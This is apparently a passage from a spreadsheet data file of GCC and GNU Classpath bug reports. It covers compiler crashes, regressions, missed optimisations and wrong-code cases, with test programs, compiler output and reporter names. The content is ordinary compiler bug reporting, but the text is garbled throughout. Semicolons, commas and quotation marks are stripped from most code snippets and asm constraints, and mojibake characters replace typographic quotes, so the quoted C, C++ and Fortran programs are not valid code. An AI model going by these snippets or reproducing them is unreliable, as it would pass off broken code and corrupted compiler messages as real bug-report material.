zsh: exit 1     /home/tbm/tmp/gcc/4.2-m68k-117734/gcc/g++  -O2 -fPIC blender-IK_QSegment.cpp
(sid)117:tbm@usurper: ~]</t>
  </si>
  <si>
    <t>GCC-15948</t>
  </si>
  <si>
    <t>[3.4 Regression] THUMB: ICE with non-commutative cbranch</t>
  </si>
  <si>
    <t>Compiling the following file with -O2 causes an assert failure inside gcc:
    void ouch(int *s)
    {
        int e = s[0]
        if ((e &amp; 2) == 0) {
            return
        }
        s[0]=0
        s[1]=0
    }
(That's it.) The reported error is:
    $ arm-elf-gcc -save-temps -c ouch.c -mthumb -O2 -o ouch.o
    ouch.c: In function `ouch':
    ouch.c:9: internal compiler error: in do_output_reload at reload1.c:6895
    Please submit a full bug report
    with preprocessed source if appropriate.
    See  for instructions.
Here's the salient part of reload1.c:
    /* If is a JUMP_INSN we can't support output reloads yet.  */
    if (GET_CODE (insn) == JUMP_INSN)
      abort () // LINE 6895
Here's how I configured and built the compiler:
$ tar -xjvf gcc-core-3.4.0.tar.bz2
$ cd gcc-3.4.0
$ ./configure --prefix=/usr/local/armdev --target=arm-elf --with-newlib --enable-languages=c
The following lines were uncommented in gcc/config/arm/t-arm-elf:
MULTILIB_OPTIONS    += mno-thumb-interwork/mthumb-interwork
MULTILIB_DIRNAMES   += normal interwork
MULTILIB_EXCEPTIONS += *mapcs-26/*mthumb-interwork*
$ make
$ sudo make install
In case it matters I'm currently using binutils-2.15.</t>
  </si>
  <si>
    <t>danfuzz</t>
  </si>
  <si>
    <t>GCC-81719</t>
  </si>
  <si>
    <t>Range-based for loop on short fixed size array generates long unrolled loop</t>
  </si>
  <si>
    <t>C++11 range-based for loops over arrays of size known at compile time result in  bloated branchy and unreachable code with -O3 optimization.  For example:
    typedef int Items[2]
    struct ItemArray
    {
        Items items
        int sum_x2() const
    }
    int ItemArray::sum_x2() const
    {
        int total = 0
        for (int item : items)
        {
            total += item
        }
        return total
    }
Clang compiles the above to [mov add ret].  GCC with -O2 compiles it to a few more than that and with -O3 a whopping 81 instructions.  Add -march=haswell and behold about 130 instructions to add two ints.
GCC (all versions 4 to 7) generates code to handle a variable-sized array up to about 6 to 14 elements depending on -march.  The number of elements is known at compile time to be 2 (other small values also elicit the bug).  GCC should generate three instructions in both -O2 and -O3.  It actually does if sum_x2() is a free function instead of a member function.  The problem also goes away if you use a C-style loop.
There are lots of permutations of this including using a range-based for loop to assign a common value to every element of an array whose size is known at compile time (120 instructions to assign a single int: https://godbolt.org/g/BGYggD).
Discussion on Stack Overflow: https://stackoverflow.com/questions/45496987/gcc-optimizes-fixed-range-based-for-loop-as-if-it-had-longer-variable-length</t>
  </si>
  <si>
    <t>jzwinck</t>
  </si>
  <si>
    <t>GCC-24554</t>
  </si>
  <si>
    <t>C:\Fortran&gt;gfortran TOBAM5.f
TOBAM5.f:527: internal compiler error: in gfc_assign_data_value at fortran/data
.c:319
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>mabdallah</t>
  </si>
  <si>
    <t>GCC-45750</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in iterative_hash_expr at tree.c:6831 on invalid code</t>
  </si>
  <si>
    <t>Compiler output:
$ gcc -O testcase.c
testcase.c:6:1: error: invalid initializer
testcase.c: In function 'foo':
testcase.c:10:20: error: 'undeclared' undeclared (first use in this function)
testcase.c:10:20: note: each undeclared identifier is reported only once for each function it appears in
testcase.c:10:31: internal compiler error: in iterative_hash_expr at tree.c:6831
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
----- testcase.c -----
struct S
{
  int i
}
int invalid[] = 0
void foo (void)
{
  if (((struct S *)undeclared)-&gt;i)
}
----------------------
Tested revisions:
r164484 - crash
r161659 - crash
r159696 - OK
4.5 r163761 - OK</t>
  </si>
  <si>
    <t>GCC-45857</t>
  </si>
  <si>
    <t>[4.5 Regression] memory exhausted compiling some variadic templates</t>
  </si>
  <si>
    <t>Created attachment 21933
minimized testcase
This looks like a regression in 4.5 couldn't reproduce it in 4.3 4.4 or 4.6.
$ ulimit -v 2600000   # 2.5 GB
$ ulimit -t 120
$ g++-4.5.x -v -std=c++0x -O2 -c memory_hog.min.cpp
Using built-in specs.
COLLECT_GCC=/opt/software/x86_64/gcc-4.5.x/bin/g++-4.5.x
COLLECT_LTO_WRAPPER=/opt/software/x86_64/gcc-4.5.x/libexec/gcc/x86_64-unknown-linux-gnu/4.5.2/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4_5-branch/configure --prefix=/opt/software/x86_64/gcc-4.5.x --program-suffix=-4.5.x --enable-languages=cc++ --enable-checking
Thread model: posix
gcc version 4.5.2 20100930 (prerelease) (GCC)
COLLECT_GCC_OPTIONS='-v' '-std=c++0x' '-O2' '-c' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /opt/software/x86_64/gcc-4.5.x/libexec/gcc/x86_64-unknown-linux-gnu/4.5.2/cc1plus -quiet -v -D_GNU_SOURCE memory_hog.min.cpp -quiet -dumpbase memory_hog.min.cpp -mtune=generic -march=x86-64 -auxbase memory_hog.min -O2 -std=c++0x -version -o /tmp/cciTomr1.s
GNU C++ (GCC) version 4.5.2 20100930 (prerelease) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.5.2 20100930 (prerelease) GMP version 4.3.2 MPFR version 3.0.0-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ignoring nonexistent directory /opt/software/x86_64/gcc-4.5.x/lib/gcc/x86_64-unknown-linux-gnu/4.5.2/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /opt/software/x86_64/gcc-4.5.x/lib/gcc/x86_64-unknown-linux-gnu/4.5.2/../../../../include/c++/4.5.2
 /opt/software/x86_64/gcc-4.5.x/lib/gcc/x86_64-unknown-linux-gnu/4.5.2/../../../../include/c++/4.5.2/x86_64-unknown-linux-gnu
 /opt/software/x86_64/gcc-4.5.x/lib/gcc/x86_64-unknown-linux-gnu/4.5.2/../../../../include/c++/4.5.2/backward
 /usr/local/include
 /opt/software/x86_64/gcc-4.5.x/include
 /opt/software/x86_64/gcc-4.5.x/lib/gcc/x86_64-unknown-linux-gnu/4.5.2/include
 /opt/software/x86_64/gcc-4.5.x/lib/gcc/x86_64-unknown-linux-gnu/4.5.2/include-fixed
 /usr/include
End of search list.
GNU C++ (GCC) version 4.5.2 20100930 (prerelease) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.5.2 20100930 (prerelease) GMP version 4.3.2 MPFR version 3.0.0-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 1be67b2d58ac92677e3812da572956df
memory_hog.min.cpp: In instantiation of â€˜_Tuple_impl &gt;â€™:
memory_hog.min.cpp:28:1:   instantiated from â€˜tuple &gt;â€™
memory_hog.min.cpp:51:27:   instantiated from here
memory_hog.min.cpp:15:1: warning: direct base â€˜_Head_baseâ€™ inaccessible in â€˜_Tuple_impl &gt;â€™ due to ambiguity
virtual memory exhausted: Cannot allocate memory</t>
  </si>
  <si>
    <t>GCC-57804</t>
  </si>
  <si>
    <t>Wasted work in gfc_trans_transfer()</t>
  </si>
  <si>
    <t>The problem appears in revision 200588 in version 4.9.
In method gfc_trans_transfer() in gcc/fortran/trans-io.c the loop on line 2261 should break immediately after seen_vector is set to true. All the iterations after seen_vector set to true do not perform any useful work at best they just set seen_vector again to true.</t>
  </si>
  <si>
    <t>GCC-563</t>
  </si>
  <si>
    <t>Internal compiler error in 'const_hash' at varasm.c:2372</t>
  </si>
  <si>
    <t>Error messages are as follows:
Reading specs from /usr/lib/gcc-lib/i686-pc-cygwin/2.95.2/specs
gcc version 2.95.2 19991024 (release-2)
GNU CPP version 2.95.2 19991024 (release-2) (80386 BSD syntax)
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc-lib/i686-pc-cygwin/2.95.2/../../../../include/g++-3
 /usr/lib/gcc-lib/i686-pc-cygwin/2.95.2/../../../../include
 /usr/include
 /usr/lib/gcc-lib/i686-pc-cygwin/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/lib/gcc-lib/i686-pc-cygwin/2.95.2/cc1plus.exe example.ii -quiet -dumpbase example.cc -version -o example.s
GNU C++ version 2.95.2 19991024 (release-2) (i686-pc-cygwin) compiled by GNU C version 2.95.2 19991024 (release-2).
example.cpp: In function `int main()':
example.cpp:13: Internal compiler error in `const_hash' at varasm.c:2372
Please submit a full bug report.
See  for instructions.
Release:
gcc version 2.95.2 (19991024) release-2
Environment:
Windows 95 running Cygwin
How-To-Repeat:
Just run:
c++ -o  example.cpp</t>
  </si>
  <si>
    <t>nill</t>
  </si>
  <si>
    <t>GCC-14851</t>
  </si>
  <si>
    <t>[4.0 Regression] suboptimal fp division with -ffast-math</t>
  </si>
  <si>
    <t>Floating point division in current CVS gcc expands x/x into (1/x)*x. This testcase:
double test(double x)
{
        return x/x
}
is with gcc 3.5.0 20040405 (experimental) with -O2 -ffast-math compiled to:
test:
        pushl   %ebp
        movl    %esp %ebp
        fldl    8(%ebp)
        fld1
        fdiv    %st(1) %st
        popl    %ebp
        fmulp   %st %st(1)
        ret
And with gcc 3.2 20020903 (Red Hat Linux 8.0 3.2-7):
test:
        pushl   %ebp
        movl    %esp %ebp
        fldl    8(%ebp)
        fdiv    %st(0) %st
        leave
        ret</t>
  </si>
  <si>
    <t>GCC-46423</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: g++.dg/torture/pr34850.C</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 166555 gave:
FAIL: g++.dg/torture/pr34850.C  -O0  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -O1  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -O2  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -O3 -fomit-frame-pointer  (test for excess error
s)
FAIL: g++.dg/torture/pr34850.C  -O3 -g  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -Os  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -O2 -flto  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -O2 -fwhopr  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -O0  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -O1  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -O2  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -O3 -fomit-frame-pointer  (test for excess error
s)
FAIL: g++.dg/torture/pr34850.C  -O3 -g  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -Os  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -O2 -flto  (test for excess errors)
FAIL: g++.dg/torture/pr34850.C  -O2 -fwhopr  (test for excess errors)
Revision 166552 is OK.</t>
  </si>
  <si>
    <t>GCC-66556</t>
  </si>
  <si>
    <t>Wrong code-generation for armv7-a big-endian at -Os</t>
  </si>
  <si>
    <t>Created attachment 35789
test case
The test case is attached.
toolchain built from latest trunk code and branch 5 produce wrong code-generation with the following command line option.
arm-none-eabi-gcc -march=armv7-a -mbig-endian -Os test.c -o test.out
The correct output should be:
checksum = ff
However the result is:
checksum = 7
The testcase is correctly compiled at -O1 which gives the right execution result. The test case works fine for little-endian at any optimization level.</t>
  </si>
  <si>
    <t>renlin</t>
  </si>
  <si>
    <t>GCC-33804</t>
  </si>
  <si>
    <t>ICE in vect_transform_stmt at tree-vect-transform.c:6131 with -ftree-vectorize</t>
  </si>
  <si>
    <t>falk@juist:/tmp% gcc -c -O2 129.c              
falk@juist:/tmp% gcc -c -O2 -ftree-vectorize 129.c
129.c: In function 'add_bytes_c':
129.c:1: internal compiler error: in vect_transform_stmt at tree-vect-transform.c:6131
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-78683</t>
  </si>
  <si>
    <t>[ppc] __builtin_ctzl code gen can be improved for -mcpu=power8 and earlier</t>
  </si>
  <si>
    <t>For this code:
unsigned r r = (unsigned) __builtin_ctzl(v) return r
GCC on POWER produces:
		 neg 93
		 and 393
		 cntlzd 33
		 subfic 3363
		 rldicl 33032
Two other compilers produce the following sequences:
		 addi 4 3 -1
		 andc 3 4 3
		 popcntd 3 3
or
		 addi       r0r3-1
		 andc       r0r0r3
		 cntlzd     r0r0
		 subfic     r3r064
We should probably be using the short and elegant popcntd solution.</t>
  </si>
  <si>
    <t>GCC-21889</t>
  </si>
  <si>
    <t>Native Solaris assembler cannot grok DTP-relative debug symbols</t>
  </si>
  <si>
    <t>smalltalk= cat test.c
__thread int x
smalltalk= gcc -c test.c
smalltalk= gcc -g -c test.c
/usr/ccs/bin/as: /var/tmp//cc09foyk.s line 75: error: statement syntax
/usr/ccs/bin/as: /var/tmp//cc09foyk.s line 75: error: statement syntax
/usr/ccs/bin/as: /var/tmp//cc09foyk.s line 75: error: statement syntax
Line 75 of the generated assembly is:
    .xword  %r_tls_dtpoff64(x)
Compiling with -m32 produces something that's equally broken but with 32
instead of 64.</t>
  </si>
  <si>
    <t>GCC-29254</t>
  </si>
  <si>
    <t>[4.2 Regression] verify_cgraph_node failed (inlined_to pointer is set but no predecessors found)</t>
  </si>
  <si>
    <t>I get the following ICE:
tbm@coconut0:~$ /usr/lib/gcc-snapshot/bin/gcc -c -O3 -Werror qof-jvp_frame.c
cc1: warnings being treated as errors
qof-jvp_frame.c: In function 'kvp_frame_compare':
qof-jvp_frame.c:60: warning: passing argument 1 of 'kvp_frame_for_each_slot' discards qualifiers from pointer target type
qof-jvp_frame.c: At top level:
qof-jvp_frame.c:62: error: inlined_to pointer is set but no predecessors found
kvp_value_compare/6: (inline copy in kvp_glist_compare/0) availability:available(2) 19 insns (39 after inlining) tree externally_visible finalized inlinable
  called by:
  calls: kvp_glist_compare/11 (inlined)
qof-jvp_frame.c:62: internal compiler error: verify_cgraph_node failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
tbm@coconut0:~$ /usr/lib/gcc-snapshot/bin/gcc -c -O3 qof-jvp_frame.c
qof-jvp_frame.c: In function 'kvp_frame_compare':
qof-jvp_frame.c:60: warning: passing argument 1 of 'kvp_frame_for_each_slot' discards qualifiers from pointer target type
tbm@coconut0:~$ gcc-4.1 -c -O3 -Werror qof-jvp_frame.c
tbm@coconut0:~$
Testcase:
typedef int gint
typedef void *gpointer
typedef struct _GList GList
struct _GList
{
  gpointer data
}
__fsid_t
typedef struct _KvpFrame KvpFrame
typedef struct _KvpValue KvpValue
typedef enum
{
    KVP_TYPE_GLIST
}
KvpValueType
struct _KvpValue
{
  KvpValueType type
  union
  {
    GList *list
  }
  value
}
kvp_glist_compare (const GList * list1 const GList * list2)
{
  const GList *lp1
  const GList *lp2
  while (lp1 &amp;&amp; lp2)
    {
      KvpValue *v1 = (KvpValue *) lp1-&gt;data
      KvpValue *v2 = (KvpValue *) lp2-&gt;data
      gint vcmp = kvp_value_compare (v1 v2)
    }
}
kvp_frame_for_each_slot (KvpFrame * f
                         void (*proc) (const char *key KvpValue * value
                                       gpointer data) gpointer data)
{
}
kvp_value_compare (const KvpValue * kva const KvpValue * kvb)
{
  switch (kva-&gt;type)
    {
    case KVP_TYPE_GLIST:
      return kvp_glist_compare (kva-&gt;value.list kvb-&gt;value.list)
    }
}
typedef struct
{
}
kvp_frame_cmp_status
static void
kvp_frame_compare_helper (const char *key KvpValue * val gpointer data)
{
}
kvp_frame_compare (const KvpFrame * fa const KvpFrame * fb)
{
  kvp_frame_cmp_status status
  kvp_frame_for_each_slot ((KvpFrame *) fb kvp_frame_compare_helper
}</t>
  </si>
  <si>
    <t>GCC-51135</t>
  </si>
  <si>
    <t>[4.7 Regression] SIGSEGV during exception cleanup on win32</t>
  </si>
  <si>
    <t>It looks like __thiscall is now the default calling convention for member functions (where possible) for win32 targets. This seems to have broken exception cleanup. 
This seg faults when executed (and compiled by mingw-32):
===============
struct except {
  virtual ~except() {}
}
int main() {
  try {
    throw except()
  } catch(except) {
  }
}
===============
The seg fault occurs after the catch block is exited and except::~except() is called by the runtime. I think __gxx_exception_cleanup (in libstdc++-v3/libsupc++/eh_throw.cc) is still trying to call except::~except() using the old calling convention resulting in a seg fault on any access to 'this'.
-Chris</t>
  </si>
  <si>
    <t>gurnec-bugz</t>
  </si>
  <si>
    <t>GCC-81066</t>
  </si>
  <si>
    <t>sanitizer_stoptheworld_linux_libcdep.cc:276:22: error: aggregate â€˜sigaltstack handler_stackâ€™ has incomplete type and cannot be defined</t>
  </si>
  <si>
    <t>glibc trunk breaks build for the sanitizers:
/home/markus/gcc/libsanitizer/sanitizer_common/sanitizer_stoptheworld_linux_libcdep.cc: In function â€˜int __sanitizer::TracerThread(void*)â€™:
/home/markus/gcc/libsanitizer/sanitizer_common/sanitizer_stoptheworld_linux_libcdep.cc:276:22: error: aggregate â€˜sigaltstack handler_stackâ€™ has incomplete type and cannot be defined
   struct sigaltstack handler_stack
This is caused by the following glibc patch:
https://sourceware.org/git/?p=glibc.gita=commitdiffh=7553131847151d04d58a02300673f13d73861cbb</t>
  </si>
  <si>
    <t>GCC-80075</t>
  </si>
  <si>
    <t>[5 Regression] ICE: statement marked for throw but doesnâ€™t with -fnon-call-exceptions</t>
  </si>
  <si>
    <t>Compiling this C++ code with -O2 -fnon-call-exceptions crashes trunk:
struct s {
  int i
}
extern int use_memcpy
extern void my_memcpy(void* void* int)
int
f (struct s* p)
{
  struct s a
  try
    {
      a = (struct s){}
      if (!use_memcpy)
	*p = a
      else
	my_memcpy (p 
    } catch (...)
    {
      return 0
    }
  return 1
}
I get
foo.cc: In function â€˜int f(s*)â€™:
foo.cc:9:1: error: statement marked for throw but doesnâ€™t
 f (struct s* p)
 ^
# .MEM_10 = VDEF 
*p_8(D) = {}
foo.cc:9:1: internal compiler error: verify_gimple failed
0xe040ee verify_gimple_in_cfg(function* bool)
	../../gccgo3/gcc/tree-cfg.c:5266
0xce04ba execute_function_todo
	../../gccgo3/gcc/passes.c:1966
0xce0ef5 execute_todo
	../../gccgo3/gcc/passes.c:2016
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
The problem arises when optimize_memcpy in tree-ssa-ccp changes
  struct s a
  int use_memcpy.0_1
   [100.00%]:
  a = {}
  use_memcpy.0_1 = use_memcpy
  if (use_memcpy.0_1 == 0)
    goto  [63.36%]
  else
    goto  [36.64%]
   [63.36%]:
  *p_5(D) = a
  goto  [100.00%]
   [36.64%]:
  my_memcpy (p_5(D) 
   [100.00%]:
  a ={v} {CLOBBER}
  return
into
  struct s a
  int use_memcpy.0_1
   [100.00%]:
  a = {}
  use_memcpy.0_1 = use_memcpy
  if (use_memcpy.0_1 == 0)
    goto  [63.36%]
  else
    goto  [36.64%]
   [63.36%]:
  *p_5(D) = {}
  goto  [100.00%]
   [36.64%]:
  my_memcpy (p_5(D) 
   [100.00%]:
  a ={v} {CLOBBER}
  return
The RHS of the assignment in bb 3 changed from a to {}.  That transformation seems OK.  However the verification pass believes that the new statement *p_5(D) = {} does not throw.  That is of course incorrect.  Because I am using -fnon-call-exceptions the statement will throw if p is NULL.
In looking at this I see stmt_could_throw_1_p in tree-eh.c calls operation_could_trap_helper_p passing the assignment code which is now CONSTRUCTOR.  The latter function always returns false for CONSTRUCTOR with *handled = true.  It's correct that CONSTRUCTOR can not trap but it doesn't follow that the statement as a whole can not trap.  But I don't really understand why stmt_could_throw_1_p doesn't always check the LHS of the assignment statement so basically I'm not sure why this works in general.
I actually ran into this with some Go code and reverse engineered a C++ example.
This C++ example compiles with GCC 6 so this appears to be a regression.</t>
  </si>
  <si>
    <t>GCC-80148</t>
  </si>
  <si>
    <t>[7 Regression] operand has impossible constraints</t>
  </si>
  <si>
    <t>This pop up in kernel code. We have:
#define __cmpxchg_double(pfx p1 p2 o1 o2 n1 n2)			\
({									\
	bool __ret							\
	__typeof__(*(p1)) __old1 = (o1) __new1 = (n1)			\
	__typeof__(*(p2)) __old2 = (o2) __new2 = (n2)			\
	asm volatile(pfx cmpxchg%c4b %2 sete %0			\
		     : =a (__ret) +d (__old2)			\
		       +m (*(p1)) +m (*(p2))			\
		     : i (2 * sizeof(long)) a (__old1)		\
		       b (__new1) c (__new2))			\
	__ret								\
})
#define arch_cmpxchg_double(p1 p2 o1 o2 n1 n2) \
	__cmpxchg_double(LOCK_PREFIX p1 p2 o1 o2 n1 n2)
#define cmpxchg_double(p1 p2 o1 o2 n1 n2)				\
({									\
	__typeof__(p1) ____p1 = (p1)					\
	kasan_check_write(____p1 2 * sizeof(*____p1))			\
	arch_cmpxchg_double(____p1 (p2) (o1) (o2) (n1) (n2))	\
})
And this is invoked as:
		if (cmpxchg_double(&amp;page-&gt;freelist &amp;page-&gt;counters
				   freelist_old counters_old
				   freelist_new counters_new))
This fails with:
error: â€˜asmâ€™ operand has impossible constraints
However if I change cmpxchg_double as:
-	arch_cmpxchg_double(____p1 (p2) (o1) (o2) (n1) (n2))	\
+	arch_cmpxchg_double((p1) (p2) (o1) (o2) (n1) (n2))	\
It works.
I've tested with gcc version 7.0.1 20170307 (experimental) (GCC). Arnd Bergmann reported that the problem happens with 4.9 through 7.0.1 for him. I've also tried with gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) and both versions work.
It's unclear to me why introducing a local variable as __typeof__(p1) ____p1 = (p1) and then using it fails. Whereas using p1 works. Essentially we have:
asm volatile( cmpxchg%c4b %2 sete %0 : =a (__ret) +d (__old2) +m (*((
vs:
__typeof__(
...
asm volatile( cmpxchg%c4b %2 sete %0 : =a (__ret) +d (__old2) +m (*(____p1)) +m (*((
It seems to me that both versions should work the same way.
I will attach preprocessed sources for both versions. They can be compiled as:
gcc slub1.c -fno-strict-aliasing -fno-common -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m32 -msoft-float -mregparm=3 -freg-struct-return -fno-pic -mpreferred-stack-boundary=2 -march=i686 -mtune=pentium3 -Wa-mtune=generic32 -ffreestanding -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -fno-delete-null-pointer-checks -Wno-frame-address -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fno-stack-protector -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-inline-functions-called-once -Wdeclaration-after-statement -Wno-pointer-sign -fno-strict-overflow -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -Werror=incompatible-pointer-types -c</t>
  </si>
  <si>
    <t>GCC-25476</t>
  </si>
  <si>
    <t>[4.2 Regression] Fixincludes is run three times</t>
  </si>
  <si>
    <t>We now run/build fixincludes three when bootstrapping GCC.  We really only need to build/run it once after stage1.
Right now we build and run it three times which seems like a waste of time.</t>
  </si>
  <si>
    <t>GCC-6968</t>
  </si>
  <si>
    <t>functions that shouldn't accept arguments accept infinite arguments (eg test() )</t>
  </si>
  <si>
    <t>a function declared as taking no arguments accepts infinite arguments without complaint under -Wall -ansi -pedantic or any other standard 
eg
void test( ) {
  printf(shouldn't compile\n)
}
int main(void) {
  test( 1 2 3 Hello World this shouldn't compile )
  return(0)
}
above code compiles and runs without error
Release:
2.95 2.96 3.1
Environment:
Debian Linux (Potato)
Redhat Linux 7.2 (base install) glibc 2.2.2-10
Redhat Linux 7.3 (base install) glibc 2.2.5
How-To-Repeat:
sample code:
#include 
void test( ) {
  printf(shouldn't compile\n )
}
int main(void) {
  test( 1 2 3 Hello World )
  return(0)
}</t>
  </si>
  <si>
    <t>tmorelan</t>
  </si>
  <si>
    <t>CLASSPATH-24596</t>
  </si>
  <si>
    <t>Return value of getResourceAsStream().available() in jar file</t>
  </si>
  <si>
    <t>When getResourceAsStream().available() is called in the class loaded from the Jar file the return value is different in GNU Classpath and Sun JDK. 
GNU Classpath:
 getResourceAsStream().available() returns 0 or 1.
Sun's JDK:
 getResourceAsStream().available() returns actual resource size.
This is undocumented behavior I think it is not a bug.
However it is thought that it is necessary to match GNU Classpath to the behavior of Sun because there is an application that depends on this behavior.</t>
  </si>
  <si>
    <t>freebeans</t>
  </si>
  <si>
    <t>GCC-40640</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in set_value_range at tree-vrp.c:383</t>
  </si>
  <si>
    <t>gcc (GCC) 4.5.0 20090702 (experimental) [trunk revision 149195]
building gdb head as of today.  preprocessed file and coming in next update
gcc -c -g -O2 -DDEFAULT_INLINE=PSIM_INLINE_LOCALS     -DWITH_HOST_BYTE_ORDER=LITTLE_ENDIAN -DWITH_SMP=5        -DWITH_TRACE=1      -DHAVE_TERMIOS_STRUCTURE -DHAVE_TERMIOS_CLINE -DHAVE_DEVZERO     -I. -I/home/joel/test-gcc/gdb-cvs/src/sim/ppc -I/home/joel/test-gcc/gdb-cvs/src/sim/ppc/../../include -I../../bfd -I/home/joel/test-gcc/gdb-cvs/src/sim/ppc/../../bfd -I../../gdb -I/home/joel/test-gcc/gdb-cvs/src/sim/ppc/../../gdb  -I/home/joel/test-gcc/gdb-cvs/src/sim/ppc/../../gdb/config  -DHAVE_COMMON_FPU -I../common -I/home/joel/test-gcc/gdb-cvs/src/sim/ppc/../common targ-map.c
gcc -c -g -O2 -DDEFAULT_INLINE=PSIM_INLINE_LOCALS     -DWITH_HOST_BYTE_ORDER=LITTLE_ENDIAN -DWITH_SMP=5        -DWITH_TRACE=1      -DHAVE_TERMIOS_STRUCTURE -DHAVE_TERMIOS_CLINE -DHAVE_DEVZERO     -I. -I/home/joel/test-gcc/gdb-cvs/src/sim/ppc -I/home/joel/test-gcc/gdb-cvs/src/sim/ppc/../../include -I../../bfd -I/home/joel/test-gcc/gdb-cvs/src/sim/ppc/../../bfd -I../../gdb -I/home/joel/test-gcc/gdb-cvs/src/sim/ppc/../../gdb  -I/home/joel/test-gcc/gdb-cvs/src/sim/ppc/../../gdb/config  -DHAVE_COMMON_FPU -I../common -I/home/joel/test-gcc/gdb-cvs/src/sim/ppc/../common /home/joel/test-gcc/gdb-cvs/src/sim/ppc/main.c
/home/joel/test-gcc/gdb-cvs/src/sim/ppc/hw_opic.c: In function â€˜hw_opic_io_read_bufferâ€™:
/home/joel/test-gcc/gdb-cvs/src/sim/ppc/hw_opic.c:1613:1: internal compiler error: in set_value_range at tree-vrp.c:383</t>
  </si>
  <si>
    <t>GCC-17470</t>
  </si>
  <si>
    <t>Visibility attribute ignored for explicit template instantiation</t>
  </si>
  <si>
    <t>[isolde:tmp]$ cat foo.cc
template  T identity(T t) { return t }
template int identity(int)
template  __attribute__((visibility(default))) double identity(double)
[isolde:tmp]$ /work/root.u/bin/g++ -fvisibility=hidden -c foo.cc
[isolde:tmp]$ nm -m foo.o
00000024 (__TEXT__text) private external __Z8identityIdET_S0_
00000000 (absolute) private external __Z8identityIdET_S0_.eh
00000000 (__TEXT__text) private external __Z8identityIiET_S0_
00000000 (absolute) private external __Z8identityIiET_S0_.eh
[isolde:tmp]$</t>
  </si>
  <si>
    <t>GCC-2470</t>
  </si>
  <si>
    <t>Incorrect warning: control reaches end of non-void function</t>
  </si>
  <si>
    <t>An incorrect warning is given. It seems that this warning
has it's source in the optimizer some people on gnu.gcc.help
tested it for different targets on different plateforms.
In larger projects this bug can lead to extreme long and
memory-consuming compilation processes (over 5 min and 1GB
for a program that only needs 20 sec and 100MB to compile
otherwise).
Release:
gcc-2.95.[23]
Environment:
Linux 2.2 and various other
How-To-Repeat:
Recompile the example</t>
  </si>
  <si>
    <t>daniel.frey</t>
  </si>
  <si>
    <t>GCC-30068</t>
  </si>
  <si>
    <t>[4.1 only] Ambigous interfaces not detected</t>
  </si>
  <si>
    <t>Examples taken from the Fortran 2003 standard Section C.11.2.
They are not recognized as invalid.
 * * *
INTERFACE BAD8 ! this interface is invalid !
  ! despite the fact that it is unambiguous !
  SUBROUTINE S8A(XYZ)
    REALOPTIONAL :: X
    INTEGER :: Y
    REAL :: Z
  END SUBROUTINE S8A
  SUBROUTINE S8B(XZY)
    INTEGEROPTIONAL :: X
    INTEGER :: Z
    REAL :: Y
  END SUBROUTINE S8B
END INTERFACE BAD8
This interface fails rule (3) because there are no required arguments that can be distinguished from the positionally corresponding argument but in order for the mismatch of the optional arguments not to be relevant the later arguments must be specified as keyword arguments so distinguishing by name does the trick. This interface is nevertheless invalid so a standard-conforming Fortran processor is not required to do such reasoning. The rules to cover all cases are too complicated to be useful.
 * * *
module x
  INTERFACE BAD9 ! this interface is invalid !
  ! despite the fact that it is unambiguous !
    SUBROUTINE S9A(X)
      REAL :: X
    END SUBROUTINE S9A
    SUBROUTINE S9B(X)
      INTERFACE
        FUNCTION X(A)
          REAL :: XA
        END FUNCTION X
      END INTERFACE
    END SUBROUTINE S9B
    SUBROUTINE S9C(X)
      INTERFACE
        FUNCTION X(A)
          REAL :: X
          INTEGER :: A
        END FUNCTION X
      END INTERFACE
    END SUBROUTINE S9C
  END INTERFACE BAD9
end module x
